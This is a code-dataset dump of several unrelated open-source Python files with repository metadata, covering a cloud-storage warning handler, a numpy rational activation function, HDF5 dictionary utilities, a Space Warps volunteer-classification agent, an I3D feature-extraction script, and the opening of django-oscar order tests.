redundanz_warnung = 'Sie nutzen aktuell nur einen Cloud-basierten Speicher-Dienst. '
redundanz_warnung = redundanz_warnung + 'Somit ist keine Redundanz möglich!'
redundanz_warnung = redundanz_warnung + '<p> </p>'
else:
redundanz_warnung = 'You use just a single cloud-based storage service. '
redundanz_warnung = redundanz_warnung + 'Therefore, the data is not stored in a redundant way!'
redundanz_warnung = redundanz_warnung + '<p> </p>'
elif anzahl >= 1:
if sprache == "de":
redundanz_warnung = 'Sie nutzen aktuell ' + str(anzahl) + ' Cloud-basierte Speicher-Dienste. '
redundanz_warnung = redundanz_warnung + 'Somit ist Redundanz möglich!'
redundanz_warnung = redundanz_warnung + '<p> </p>'
else:
redundanz_warnung = 'You use ' + str(anzahl) + ' cloud-based storage services. '
redundanz_warnung = redundanz_warnung + 'Therefore, the data can be stored in a redundant way!'
redundanz_warnung = redundanz_warnung + '<p> </p>'
else:
redundanz_warnung = ''
if anzahl == 1:
# If the number of storage services is 1, the data is always syncron
synchron_warnung = ''
else:
# If there are more than one storage service, check if data is synchron
# Check here for synchronicity
if Main_Liste == Second_list:
# If both Lists are equal
if sprache == "de":
synchron_warnung = '<font color="green">Ihre Daten sind synchron</font>'
synchron_warnung = synchron_warnung + '<p> </p>'
else:
synchron_warnung = '<font color="green">Your data are synchron</font>'
synchron_warnung = synchron_warnung + '<p> </p>'
else:
# If both Lists are not equal
if sprache == "de":
synchron_warnung = '<font color="red">Ihre Daten sind nicht synchron!</font>'
synchron_warnung = synchron_warnung + '<p> </p>'
else:
synchron_warnung = '<font color="red">The synchronicity of your data is broken!</font>'
synchron_warnung = synchron_warnung + '<p> </p>'
template_values = {
'navigations_bar': navigations_bar,
'url': url,
'url_linktext': url_linktext,
'bucket_keys_tabelle': bucket_keys_tabelle,
'input_error_message': input_error_message,
'keys_upload_formular': keys_upload_formular,
'alle_keys_loeschen_button': alle_keys_loeschen_button,
'redundanz_warnung': redundanz_warnung,
'ajax_formular': ajax_formular,
'iframe': iframe,
'synchron_warnung': synchron_warnung
}
path = os.path.join(os.path.dirname(__file__), "../templates", sprache, "s3.html")
self.response.out.write(template.render(path,template_values))
| 53.553663 | 209 | 0.614264 |
ace94dba524331e60de9e97e92ca0013c537f5f6 | 8,955 | py | Python | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
] | null | null | null | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
] | null | null | null | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
] | null | null | null | import numpy as np
class Rational():
"""
Rational activation function based on numpy
Arguments:
approx_func (str):
The name of the approximated function for initialisation. \
The different initialable functions are available in \
`rational.rationals_config.json`. \n
Default ``leaky_relu``.
degrees (tuple of int):
The degrees of the numerator (P) and denominator (Q).\n
Default ``(5, 4)``
version (str):
Version of Rational to use. Rational(x) = P(x)/Q(x)\n
`A`: Q(x) = 1 + \|b_1.x\| + \|b_2.x\| + ... + \|b_n.x\|\n
`B`: Q(x) = 1 + \|b_1.x + b_2.x + ... + b_n.x\|\n
`C`: Q(x) = 0.1 + \|b_1.x + b_2.x + ... + b_n.x\|\n
`D`: like `B` with noise\n
Default ``A``
Returns:
Module: Rational module
"""
def __init__(self, approx_func="leaky_relu", degrees=(5, 4), version="A"):
from rational.utils.get_weights import get_parameters
w_numerator, w_denominator = get_parameters(version, degrees,
approx_func)
self.numerator = w_numerator
self.denominator = w_denominator
self.init_approximation = approx_func
self.degrees = degrees
self.version = version
if version == "A":
rational_func = Rational_version_A
elif version == "B":
rational_func = Rational_version_B
elif version == "C":
rational_func = Rational_version_C
elif version == "# NOTE: ":
rational_func = Rational_version_N
else:
raise ValueError("version %s not implemented" % version)
self.activation_function = rational_func
def __call__(self, x):
if type(x) is int:
x = float(x)
return self.activation_function(x, self.numerator, self.denominator)
def torch(self, cuda=None, trainable=True, train_numerator=True,
train_denominator=True):
"""
Returns a torch version of this activation function.
Arguments:
cuda (bool):
Use GPU CUDA version. If None, use cuda if available on \
the machine\n
Default ``None``
trainable (bool):
If the weights are trainable, i.e, if they are updated \
during backward pass\n
Default ``True``
Returns:
function: Rational torch function
"""
from rational.torch import Rational as Rational_torch
import torch.nn as nn
import torch
rtorch = Rational_torch(self.init_approximation, self.degrees,
cuda, self.version, trainable,
train_numerator, train_denominator)
rtorch.numerator = nn.Parameter(torch.FloatTensor(self.numerator)
.to(rtorch.device),
requires_grad=trainable and train_numerator)
rtorch.denominator = nn.Parameter(torch.FloatTensor(self.denominator)
.to(rtorch.device),
requires_grad=trainable and train_denominator)
return rtorch
def fit(self, function, x_range=np.arange(-3., 3., 0.1)):
"""
Compute the parameters a, b, c, and d to have the neurally equivalent \
function of the provided one as close as possible to this rational \
function.
Arguments:
function (callable):
The function you want to fit to rational.
x (array):
The range on which the curves of the functions are fitted \
together. \n
Default ``True``
show (bool):
If ``True``, plots the final fitted function and \
rational (using matplotlib) \n
Default ``False``
Returns:
tuple: ((a, b, c, d), dist) with: \n
a, b, c, d: the parameters to adjust the function \
(vertical and horizontal scales and bias) \n
dist: The final distance between the rational function and the \
fitted one.
"""
from rational.utils import find_closest_equivalent
(a, b, c, d), distance = find_closest_equivalent(self, function,
x_range)
return (a, b, c, d), distance
def __repr__(self):
return (f"Rational Activation Function (Numpy version "
f"{self.version}) of degrees {self.degrees}")
def numpy(self):
return self
def show(self, input_range=None, display=True, distribution=None):
"""
Show the function using `matplotlib`.
Arguments:
input_range (range):
The range to print the function on.\n
Default ``None``
display (bool):
If ``True``, displays the graph.
Otherwise, returns it. \n
Default ``True``
"""
import matplotlib.pyplot as plt
try:
import seaborn as sns
sns.set_style("whitegrid")
except ImportError as e:
print("seaborn not found on computer, install it for better",
"visualisation")
ax = plt.gca()
if input_range is None:
if distribution is None:
distribution = self.distribution
if distribution is None:
input_range = np.arange(-3, 3, 0.01)
else:
freq, bins = _cleared_arrays(distribution)
if freq is None:
input_range = np.arange(-3, 3, 0.01)
else:
ax2 = ax.twinx()
ax2.set_yticks([])
grey_color = (0.5, 0.5, 0.5, 0.6)
ax2.bar(bins, freq, width=bins[1] - bins[0],
color=grey_color, edgecolor=grey_color)
input_range = np.array(bins).float()
else:
input_range = np.array(input_range).float()
outputs = self.activation_function(input_range, self.numerator,
self.denominator, False)
outputs_np = outputs.detach().cpu().numpy()
ax.plot(input_range.detach().cpu().numpy(),
outputs_np)
if display:
plt.show()
else:
return plt.gcf()
def Rational_version_A(x, w_array, d_array):
xi = np.ones_like(x)
P = np.ones_like(x) * w_array[0]
for i in range(len(w_array) - 1):
xi *= x
P += w_array[i+1] * xi
xi = np.ones_like(x)
Q = np.ones_like(x)
for i in range(len(d_array)):
xi *= x
Q += np.abs(d_array[i] * xi)
return P/Q
def Rational_version_B(x, w_array, d_array):
xi = np.ones_like(x)
P = np.ones_like(x) * w_array[0]
for i in range(len(w_array) - 1):
xi *= x
P += w_array[i+1] * xi
xi = np.ones_like(x)
Q = np.zeros_like(x)
for i in range(len(d_array)):
xi *= x
Q += d_array[i] * xi
Q = np.abs(Q) + np.ones_like(Q)
return P/Q
def Rational_version_C(x, w_array, d_array):
xi = np.ones_like(x)
P = np.ones_like(x) * w_array[0]
for i in range(len(w_array) - 1):
xi *= x
P += w_array[i+1] * xi
xi = np.ones_like(x)
Q = np.zeros_like(x)
for i in range(len(d_array)):
Q += d_array[i] * xi # Here b0 is considered
xi *= x
Q = np.abs(Q) + np.full_like(Q, 0.1)
return P/Q
def Rational_version_N(x, w_array, d_array):
"""
Non safe version, original rational without norm
"""
xi = np.ones_like(x)
P = np.ones_like(x) * w_array[0]
for i in range(len(w_array) - 1):
xi *= x
P += w_array[i+1] * xi
xi = np.ones_like(x)
Q = np.zeros_like(x)
for i in range(len(d_array)):
xi *= x
Q += d_array[i] * xi
Q = Q + np.ones_like(Q)
return P/Q
#if __name__ == '__main__':
# def crazy_func(x):
# outp = (100 - 50*x - 100*x**2)/(1 - 10*x - 10*x**2)
# disc = outp[:-1] * outp[1:] < -5
# idx = [-1] + [i for i, x in enumerate(disc) if x] + [len(outp)]
# return ([x[s+1:e+1] for s, e in zip(idx[:-1], idx[1:])], \
# [outp[s+1:e+1] for s, e in zip(idx[:-1], idx[1:])])
# import matplotlib.pyplot as plt
# inp = np.arange(-3, 3, 0.01)
# ax = plt.gca()
# arrs = crazy_func(inp)
# for i in range(len(arrs[0])):
# ax.plot(arrs[0][i], arrs[1][i], 'r')
# plt.show()
| 35.963855 | 88 | 0.512228 |
ace94e8c3f2fb083751c0f370605f533a7b7761e | 15,335 | py | Python | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2018-10-31T03:49:39.000Z | 2018-10-31T03:49:39.000Z | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 5 | 2017-11-18T01:45:50.000Z | 2020-05-30T12:26:50.000Z | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2019-10-14T08:44:40.000Z | 2019-10-14T08:44:40.000Z | import numpy as NP
import h5py
import ast
import warnings
def recursive_find_notNone_in_dict(inpdict):
"""
----------------------------------------------------------------------------
Recursively walk through a dictionary and reduce it to only non-None values.
Inputs:
inpdict [dictionary] Input dictionary to reduced to non-None values
Outputs:
outdict is an output dictionary which only contains keys and values
corresponding to non-None values
----------------------------------------------------------------------------
"""
if not isinstance(inpdict, dict):
raise TypeError('inpdict must be a dictionary')
outdict = {}
for k, v in inpdict.iteritems():
if v is not None:
if not isinstance(v, dict):
outdict[k] = v
else:
temp = recursive_find_notNone_in_dict(v)
if temp:
outdict[k] = temp
return outdict
################################################################################
def is_dict1_subset_of_dict2(dict1, dict2, ignoreNone=True):
"""
----------------------------------------------------------------------------
Check if keys and values of the first dictionary are a subset of the second.
Inputs:
dict1 [dictionary] First dictionary. It will be checked if both its
keys and values are a subset of the second dictionary.
dict2 [dictionary] Second dictionary. The values and keys of the first
dictionary will be checked against this dictionary to check if
the first is a subset of the second.
ignoreNone [boolean] If set to True (default), the subset checking happens
using the non-None values in both dictionaries. This is a
loose check. If set to False, a strict subset checking happens
not ignoring the None values, if any.
Output:
Boolean value True if dict1 is found to be a subset of dict2, False
otherwise
----------------------------------------------------------------------------
"""
if not isinstance(dict1, dict):
raise TypeError('Input dict1 must be a dictionary')
if not isinstance(dict2, dict):
raise TypeError('Input dict2 must be a dictionary')
if ignoreNone:
dict1 = recursive_find_notNone_in_dict(dict1)
dict2 = recursive_find_notNone_in_dict(dict2)
if cmp(dict1, dict2) == 0:
return True
else:
dict2sub = {}
for k, v in dict1.iteritems():
if k in dict2:
dict2sub[k] = dict2[k]
else:
return False
if cmp(dict1, dict2sub) == 0:
return True
else:
return False
################################################################################
def find_list_in_list(reference_array, inp):
"""
---------------------------------------------------------------------------
Find occurrences of input list in a reference list and return indices
into the reference list
Inputs:
reference_array [list or numpy array] One-dimensional reference list or
numpy array in which occurrences of elements in the input
list or array will be found
inp [list or numpy array] One-dimensional input list whose
elements will be searched in the reference array and
the indices into the reference array will be returned
Output:
ind [numpy masked array] Indices of occurrences of elements
of input array in the reference array. It will be of same
size as input array. For example,
inp = reference_array[ind]. Indices for elements which are
not found in the reference array will be masked.
---------------------------------------------------------------------------
"""
try:
reference_array, inp
except NameError:
raise NameError('Inputs reference_array, inp must be specified')
if not isinstance(reference_array, (list, NP.ndarray)):
raise TypeError('Input reference_array must be a list or numpy array')
reference_array = NP.asarray(reference_array).ravel()
if not isinstance(inp, (list, NP.ndarray)):
raise TypeError('Input inp must be a list or numpy array')
inp = NP.asarray(inp).ravel()
if (inp.size == 0) or (reference_array.size == 0):
raise ValueError('One or both inputs contain no elements')
sortind_ref = NP.argsort(reference_array)
sorted_ref = reference_array[sortind_ref]
ind_in_sorted_ref = NP.searchsorted(sorted_ref, inp)
ii = NP.take(sortind_ref, ind_in_sorted_ref, mode='clip')
mask = reference_array[ii] != inp
ind = NP.ma.array(ii, mask=mask)
return ind
################################################################################
def find_all_occurrences_list1_in_list2(list1, list2):
"""
---------------------------------------------------------------------------
Find all occurrences of input list1 (a reference list) in input list2
Inputs:
list1 [list or numpy array] List of elements which need to be searched
for in list2. Must be a flattened list or numpy array
list2 [list or numpy array] List of elements in which elements in list1
are searched for. Must be a flattened list or numpy array
Output:
ind [list of lists] Indices of occurrences of elements
of input list1 indexed into list2. For each element in list1,
there is an output list which contains all the indices of this
element occurring in list2. Hence, the output is a list of lists
where the top level list contains equal number of items as list1.
Each i-th item in this list is another list containing indices of
the element list1[i] in list2
---------------------------------------------------------------------------
"""
if not isinstance(list1, (list, NP.ndarray)):
raise TypeError('Input list1 must be a list or numpy array')
if not isinstance(list2, (list, NP.ndarray)):
raise TypeError('Input list2 must be a list or numpy array')
list_of_list_of_inds = [[i for i, x in enumerate(list2) if x == e] for e in list1]
return list_of_list_of_inds
################################################################################
def save_dict_to_hdf5(dic, filename, compressinfo=None):
"""
---------------------------------------------------------------------------
Save a dictionary as a HDF5 structure under the given filename preserving
its structure
Inputs:
dic [dictionary] Input dictionary which is to be stored in HDF5
format
filename [string] string containing full path to the HDF5 file including
the file name
compressinfo
[dictionary] Dictionary containing compression options or
set as None (default) when no compression is to be applied.
When compression is to be applied, it contains keys of those
data that are to be compressed. Under each key is another
dictionary with the following keys and values:
'compress_fmt' [string] Compression format. Accepted values
are 'gzip' and 'lzf'
'compress_opts' [int] Integer denoting level of compression.
Only applies if compress_fmt is set to 'gzip'.
It must be an integer between 0 and 9
'chunkshape' [tuple] Shape of the chunks to be used in
compression. It must be broadcastable to the
data shape inside input dic
If at any point, any error is encountered, it will switch to
no compression
---------------------------------------------------------------------------
"""
with h5py.File(filename, 'w') as h5file:
recursively_save_dict_contents_to_group(h5file, '/', dic, compressinfo=compressinfo)
################################################################################
def recursively_save_dict_contents_to_group(h5file, path, dic, compressinfo=None):
"""
---------------------------------------------------------------------------
Recursively store contents of a dictionary in HDF5 groups
Inputs:
h5file [Python File Object] An open file object under which the HDF5
groups will be created
path [string] String containing the root group under the python file
object h5file
dic [dictionary] dictionary whose keys and items will be stored
under the root group specified by path under the python file
object h5file
compressinfo
[dictionary] Dictionary containing compression options or
set as None (default) when no compression is to be applied.
When compression is to be applied, it contains keys of those
data that are to be compressed. Under each key is another
dictionary with the following keys and values:
'compress_fmt' [string] Compression format. Accepted values
are 'gzip' and 'lzf'
'compress_opts' [int] Integer denoting level of compression.
Only applies if compress_fmt is set to 'gzip'.
It must be an integer between 0 and 9
'chunkshape' [tuple] Shape of the chunks to be used in
compression. It must be broadcastable to the
data shape inside input dic
If at any point, any error is encountered, it will switch to
no compression
---------------------------------------------------------------------------
"""
for key, item in dic.iteritems():
if not isinstance(key, str):
warnings.warn('Key found not to be a string. Converting the key to string and proceeding...')
key = str(key)
if isinstance(item, (NP.ndarray, NP.int, NP.int32, NP.int64, NP.float, NP.float32, NP.float64, NP.complex, NP.complex64, NP.complex128, str, bytes)):
if isinstance(item, NP.ndarray):
if compressinfo is not None:
if isinstance(compressinfo, dict):
try:
compress_fmt = compressinfo[key]['compress_fmt'].lower()
compress_opts = NP.clip(compressinfo[key]['compress_opts'], 0, 9)
chunkshape = compressinfo[key]['chunkshape']
except:
h5file[path + key] = item
else:
dset = h5file.create_dataset(path+key, data=item, chunks=chunkshape, compression=compress_fmt, compression_opts=compress_opts)
# if not isinstance(compressinfo[key]['compress_fmt'], str):
# raise TypeError('Input parameter compress_fmt must be a string')
# compress_fmt = compressinfo[key]['compress_fmt'].lower()
# if compress_fmt not in ['gzip', 'lzf']:
# raise ValueError('Input parameter compress_fmt invalid')
# if compress_fmt == 'gzip':
# if not isinstance(compressinfo[key]['compress_opts'], int):
# raise TypeError('Input parameter compress_opts must be an integer')
# compress_opts = NP.clip(compressinfo[key]['compress_opts'], 0, 9)
# if 'chunkshape' not in compressinfo[key]:
# raise KeyError('Key chunkshape not provided in cmagompressinfo parameter')
# elif not isinstance(compressinfo[key]['chunkshape'], tuple):
# raise TypeError('Value under chunkshape key in compressinfo parameter must be a tuple')
# else:
# dset = h5file.create_dataset(path+key, data=item, chunks=chunkshape, compression=compress_fmt, compression_opts=compress_opts)
else:
warnings.warn('Compression options not specified properly. Proceeding with no compression')
h5file[path + key] = item
else:
h5file[path + key] = item
else:
h5file[path + key] = item
elif item is None:
h5file[path + key] = 'None'
elif isinstance(item, dict):
recursively_save_dict_contents_to_group(h5file, path + key + '/', item, compressinfo=compressinfo)
else:
raise ValueError('Cannot save %s type'%type(item))
################################################################################
def load_dict_from_hdf5(filename):
"""
---------------------------------------------------------------------------
Load HDF5 contents into a python dictionary preserving the structure
Input:
filename [string] Full path to the HDF5 file
Output:
Python dictionary containing the contents of the HDF5 file
---------------------------------------------------------------------------
"""
with h5py.File(filename, 'r') as h5file:
return recursively_load_dict_contents_from_group(h5file, '/')
################################################################################
def recursively_load_dict_contents_from_group(h5file, path):
"""
---------------------------------------------------------------------------
Recursively load HDF5 group contents into python dictionary structure
Inputs:
h5file [Python File Object] An open file object under which the HDF5
groups will be created
path [string] String containing the root group under the python file
object h5file
Output:
Python structure that is copied from the HDF5 content at the level
specified by the path in the python object h5file
---------------------------------------------------------------------------
"""
ans = {}
for key, item in h5file[path].items():
if isinstance(item, h5py._hl.dataset.Dataset):
if isinstance(item.value, str):
try:
if ast.literal_eval(item.value) is None:
ans[key] = None
except:
ans[key] = item.value
else:
ans[key] = item.value
elif isinstance(item, h5py._hl.group.Group):
ans[key] = recursively_load_dict_contents_from_group(h5file, path + key + '/')
return ans
################################################################################
| 42.129121 | 157 | 0.521356 |
ace94ec93b942ed24c5fc6e22663ca3b522370cd | 12,205 | py | Python | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | # ======================================================================
import swap
import numpy as np
import pylab as plt
actually_it_was_dictionary = {'LENS': 1, 'NOT': 0, 'UNKNOWN': -1}
# ======================================================================
class Agent(object):
"""
NAME
Agent
PURPOSE
A little robot who will interpret the classifications of an
individual volunteer.
COMMENTS
An Agent is assigned to represent a volunteer, whose Name is
either a Zooniverse userid or, if that is not available, an IP
address. Agents each have a History of N classifications,
including ND that turned out to be duds and NL that turned out
to be lenses. NT is the total number of training subjects
classified, and is equal to N in the simple "LENS or NOT"
analysis. Each Agent carries a "confusion matrix"
parameterised by two numbers, PD and PL, the meaning of which is
as follows:
An Agent assumes that its volunteer says:
| "LENS" when it is NOT "LENS" when it is a LENS |
| with probability (1-PD) with probability PL |
| |
| "NOT" when it is NOT "NOT" when it is a LENS |
| with probability PD with probability (1-PL) |
It makes the simplest possible assignment for these probabilities,
namely that PX = 0.5 if NX = 0, and then updates from there using the
training subjects such that
PX = (NX_correct + initialNX/2) / (NX+initialNX)
at all times. For example, if the volunteer is right about 80% of the
simulated lenses they see, the agent will assign:
PL = Pr("LENS"|LENS) = 0.8.
initialNX are listed in the configuration file.
Agents are initialised with PL = PD = some initial value,
provided in the configuration file. (0.5,0.5) would be a
conservative choice - but it may well underestimate the
volunteers' natural lens-spotting talent. PL and PD are capped
because the agents assume that their volunteers are
only human. The upper limits are kept in swap.PDmax and
swap.PLmax.
The big assumption the Agent is making is that its
volunteer has a single, constant PL and a single, constant
PD, which it estimates using all the volunteer's data. This is
clearly sub-optimal, but might be good enough for a first
attempt. We'll see!
Agents now also have a kind attribute. Agents may be 'normal' users,
'super' users, or 'banned' users. Currently being a 'super' user does
nothing, but maybe in the future they will get harder images. 'banned'
agents are ones whose contributions are ignored. Agents do not have a
method for converting themselves to 'super' or 'banned' -- that is
something for SWAP, or a bureau to do.
INITIALISATION
name
METHODS
Agent.update_contribution() Calculate the expected
information contributed
per classification
Agent.heard(it_was=X,actually_it_was=Y) Read report.
Agent.plot_history(axes)
BUGS
AUTHORS
This file is part of the Space Warps project, and is distributed
under the MIT license by the Space Warps Science Team.
http://spacewarps.org/
HISTORY
2013-04-17: Started Marshall (Oxford)
2015-01-19: Added 'kind'. (CPD)
"""
# ----------------------------------------------------------------------
def __init__(self,name,pars):
self.name = name
self.kind = 'normal' # normal, super, banned
self.PD = pars['initialPD']
self.PL = pars['initialPL']
self.ND = 2 + pars['skepticism']
self.NL = 2 + pars['skepticism']
self.N = 0
self.NT = 0
# back-compatibility:
self.contribution = 0.0*self.update_skill() # This call also sets self.skill, internally
self.traininghistory = {'ID':np.array([]),
'Skill':np.array([self.skill]),
'PL':np.array([self.PL]),
'PD':np.array([self.PD]),
'ItWas':np.array([], dtype=int),
'ActuallyItWas':np.array([], dtype=int),
'At_Time': np.array([])}
self.testhistory = {'ID':[],
'I':np.array([]),
'Skill':np.array([]),
'ItWas':np.array([], dtype=int),
'At_Time': np.array([])}
return None
# ----------------------------------------------------------------------
def __str__(self):
return 'individual classification agent representing %s with contribution %.2f' % \
(self.name,self.contribution)
# ----------------------------------------------------------------------
# Compute expected information per classification:
def update_skill(self):
## plogp = np.zeros([2])
## plogp[0] = 0.5*(self.PD+self.PL)*np.log2(self.PD+self.PL)
## plogp[1] = 0.5*(1.0-self.PD+1.0-self.PL)*np.log2(1.0-self.PD+1.0-self.PL)
## self.contribution = np.sum(plogp)
self.skill = swap.expectedInformationGain(0.5, self.PL, self.PD)
return self.skill
# ----------------------------------------------------------------------
# Update confusion matrix with latest result:
# eg. collaboration.member[Name].heard(it_was='LENS',actually_it_was='NOT',with_probability=P,ignore=False)
def heard(self,it_was=None,actually_it_was=None,with_probability=1.0,ignore=False,ID=None,record=True,at_time=None):
if it_was==None or actually_it_was==None:
pass
else:
if actually_it_was=='LENS':
if not ignore:
self.PL = (self.PL*self.NL + (it_was==actually_it_was))/(1+self.NL)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
# Always update experience, even if Agents are not willing to learn. PJM 8/7/14
self.NL += 1
self.NT += 1
elif actually_it_was=='NOT':
if not ignore:
self.PD = (self.PD*self.ND + (it_was==actually_it_was))/(1+self.ND)
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += 1
self.NT += 1
# Unsupervised learning!
elif actually_it_was=='UNKNOWN':
increment = with_probability
if it_was=='LENS':
if not ignore:
self.PL = (self.PL*self.NL + increment)/(self.NL + increment)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
self.NL += increment
if not ignore:
self.PD = (self.PD*self.ND + 0.0)/(self.ND + (1.0-increment))
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += (1.0 - increment)
elif it_was=='NOT':
if not ignore:
self.PL = (self.PL*self.NL + 0.0)/(self.NL + increment)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
self.NL += increment
if not ignore:
self.PD = (self.PD*self.ND + (1.0-increment))/(self.ND + (1.0-increment))
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += (1.0 - increment)
# self.NT += 1 # Don't count test images as training images?!
# self.NT == 0 if unsupervised? Not sure. Maybe better to count every image
# as training when unsupervised... Bit odd though.
self.NT += 1
else:
raise Exception("Apparently, the subject was actually a "+str(actually_it_was))
if record:
# Always log on what are we trained, even if not learning:
self.traininghistory['ID'] = np.append(self.traininghistory['ID'],ID)
# Always log progress, even if not learning:
self.traininghistory['Skill'] = np.append(self.traininghistory['Skill'],self.update_skill())
# NB. self.skill is now up to date.
self.traininghistory['PL'] = np.append(self.traininghistory['PL'],self.PL)
self.traininghistory['PD'] = np.append(self.traininghistory['PD'],self.PD)
self.traininghistory['ItWas'] = np.append(self.traininghistory['ItWas'], actually_it_was_dictionary[it_was])
self.traininghistory['ActuallyItWas'] = np.append(self.traininghistory['ActuallyItWas'], actually_it_was_dictionary[actually_it_was])
self.traininghistory['At_Time'] = np.append(self.traininghistory['At_Time'], at_time)
return
# ----------------------------------------------------------------------
# Update confusion matrix with many results given at once (M step):
def heard_many_times(self, probabilities, classifications, laplace_smoothing=1.):
# unlike the equivalent function in subject, this one does not need to
# reference self.heard
# classifications are assumed to be 0 (NOT) or 1 (LENS)
probability_sum = np.sum(probabilities)
probability_num = len(probabilities)
classification_probability_sum = np.dot(classifications, probabilities)
classification_sum = np.sum(classifications)
self.PL = (laplace_smoothing + classification_probability_sum) / (2 * laplace_smoothing + probability_sum)
self.PD = (laplace_smoothing + probability_num - classification_sum - probability_sum + classification_probability_sum) / (2 * laplace_smoothing + probability_num - probability_sum)
return
# ----------------------------------------------------------------------
# Plot agent's history, as an overlay on an existing plot:
def plot_history(self,axes):
plt.sca(axes)
I = self.traininghistory['Skill']
N = np.linspace(1, len(I), len(I), endpoint=True)
# Information contributions:
plt.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-")
plt.scatter(N[-1], I[-1], color="green", alpha=0.5)
return
# ----------------------------------------------------------------------
# Get a realization for agent's PL distribution
def get_PL_realization(self,Ntrajectory):
NL_correct=self.PL*self.NL;
NL_correct_realize=np.random.binomial(self.NL,self.PL,size=Ntrajectory);
PL_realize=(NL_correct_realize*1.0)/(self.NL);
idx=np.where(PL_realize>swap.PLmax);
PL_realize[idx]=swap.PLmax;
idx=np.where(PL_realize<swap.PLmin);
PL_realize[idx]=swap.PLmin;
#print NL_correct,NL_correct_realize,PL_realize
return PL_realize;
# ----------------------------------------------------------------------
# Get a realization for agent's PD distribution
def get_PD_realization(self,Ntrajectory):
ND_correct=self.PD*self.ND;
ND_correct_realize=np.random.binomial(self.ND,self.PD,size=Ntrajectory);
PD_realize=(ND_correct_realize*1.0)/(self.ND);
idx=np.where(PD_realize>swap.PDmax);
PD_realize[idx]=swap.PDmax;
idx=np.where(PD_realize<swap.PDmin);
PD_realize[idx]=swap.PDmin;
#print ND_correct,ND_correct_realize,PD_realize
return PD_realize;
# ======================================================================
| 42.824561 | 189 | 0.541008 |
ace94ee293c0b9903f5e7a997330f0db1e0f14fa | 1,269 | py | Python | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | # import subprocess
from extract_features_gpu import run
from pathlib import Path
# def extract_frames(video,output):
# # command = "ffmpeg -i {video} -ac 1 -f flac -vn {output}".format(video=video, output=output)
# command = "ffmpeg -i {video} vid1/{output}/img_%05d.jpg".format(video=video, output=output)
# subprocess.call(command,shell=True)
if __name__ == '__main__':
for i in range(1, 6):
# file structure: '{flo_folder}/{video_folder}/flow_x.jpg'
flo_folder = "../../../dataset/ECM/ecm" + str(i) + "/"
# features will be saved as '{output_dir}/{video_name}-{mode}.npz'
output_dir = "../../../data/ECM/ecm" + str(i) + "_vid_feat/"
Path(output_dir).mkdir(parents=True, exist_ok=True)
# Extract video feature for video folders in the 'input_dir', and save as 'output_dir/{video_name}-{mode}.npz'.
# Either optical flow data or rgb data that are in folder 'input_dir/video_folder/'.
run(mode="flow",
# load_model="models/flow_charades.pt",
load_model="models/flow_imagenet.pt",
sample_mode="resize",
frequency=1,
input_dir=flo_folder,
output_dir=output_dir,
batch_size=16,
usezip=0)
| 39.65625 | 119 | 0.623325 |
ace94ef195df50919a069aba0207a104df846937 | 12,508 | py | Python | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from decimal import Decimal as D
from django.test import TestCase
from django.utils import timezone
import mock
from oscar.apps.address.models import Country
from oscar.apps.order.models import ShippingAddress, Order, Line, \
ShippingEvent, ShippingEventType, ShippingEventQuantity, OrderNote, \
OrderDiscount
from oscar.apps.order.exceptions import (InvalidOrderStatus, InvalidLineStatus,
InvalidShippingEvent)
from oscar.test.factories import create_order, create_offer, create_voucher, create_basket
from oscar.test.basket import add_product
ORDER_PLACED = 'order_placed'
class ShippingAddressTest(TestCase):
fixtures = ['countries.json']
def test_titleless_salutation_is_stripped(self):
country = Country.objects.get(iso_3166_1_a2='GB')
a = ShippingAddress.objects.create(
last_name='Barrington', line1="75 Smith Road", postcode="N4 8TY", country=country)
self.assertEquals("Barrington", a.salutation)
class OrderStatusPipelineTests(TestCase):
def setUp(self):
Order.pipeline = {'PENDING': ('SHIPPED', 'CANCELLED'),
'SHIPPED': ('COMPLETE',)}
Order.cascade = {'SHIPPED': 'SHIPPED'}
def tearDown(self):
Order.pipeline = {}
Order.cascade = {}
def test_available_statuses_for_pending(self):
self.order = create_order(status='PENDING')
